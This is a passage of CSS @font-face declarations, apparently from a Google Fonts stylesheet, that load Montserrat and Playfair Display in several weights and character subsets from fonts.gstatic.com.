U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: 